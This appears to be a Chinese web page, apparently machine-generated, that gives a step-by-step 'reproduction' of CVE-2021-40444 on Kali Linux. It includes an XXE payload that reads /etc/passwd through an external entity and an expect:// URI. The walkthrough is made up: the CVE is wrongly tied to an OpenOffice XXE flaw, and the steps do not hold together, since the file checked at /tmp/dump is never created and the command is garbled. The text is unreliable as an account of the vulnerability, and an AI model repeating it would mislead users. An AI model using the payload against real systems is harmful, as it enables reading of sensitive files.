cve-2021-40444漏洞kali复现
时间: 2023-09-19 14:06:16 浏览: 144
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。
以下是在Kali Linux中复现cve-2021-40444漏洞的步骤:
1. 安装 OpenOffice
打开终端并输入以下命令:
```
sudo apt update
sudo apt install openoffice
```
2. 创建恶意文档
使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中:
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
<Content>Some content</Content>
<Image xlink:href="expect://id`xxe`"/>
</root>
```
这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。
3. 打开恶意文档
在终端中,输入以下命令以打开恶意文档:
```
soffice恶意文档.odt
```
OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。
可以在终端中使用以下命令测试是否可以读取/etc/passwd文件:
```
cat /tmp/dump
```
如果成功,将输出/etc/passwd文件的内容。
4. 修复漏洞
为了防止cve-2021-40444漏洞的利用,建议升级OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。
阅读全文